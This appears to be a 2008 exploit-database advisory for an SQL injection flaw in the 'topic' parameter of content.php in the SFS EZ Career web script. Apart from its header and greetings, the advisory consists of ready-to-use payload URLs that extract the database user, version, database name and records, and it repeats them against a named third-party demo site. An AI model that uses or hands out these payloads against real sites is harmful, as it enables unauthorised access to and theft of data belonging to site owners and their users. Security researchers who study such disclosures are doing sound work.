[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : SFS EZ Career (content.php topic) SQL Injection Vulnerability
# Published : 2008-10-31
# Author : Stack
# Previous Title : SFS EZ Auction (viewfaqs.php cat) Blind SQL Injection Vulnerability
# Next Title : SFS EZ Top Sites (topsite.php ts) Remote SQL Injection Vulnerability
###########################################################################
# Kira has decide be back after halloween
###########################################################################
# Discovered by : Mountassif Moad
# Type Gap : Sql execution
# Script : SFS EZ Career Remote sql execution
# Home Script : http://www.scripts-for-sites.info/item.php?item=92
# Greetz : Allah , All my freind
##########################################################################
Exploit :
http://localhost/[career]/content.php?topic=user()
http://localhost/[career]/content.php?topic=version()
http://localhost/[career]/content.php?topic=database()
http://localhost/[career]/content.php?topic=id
Demo :
http://www.turnkeyzone.com/demos/career/content.php?topic=id
http://www.turnkeyzone.com/demos/career/content.php?topic=version()
http://www.turnkeyzone.com/demos/career/content.php?topic=user()
http://www.turnkeyzone.com/demos/career/content.php?topic=database()
# www.Syue.com [2008-10-31]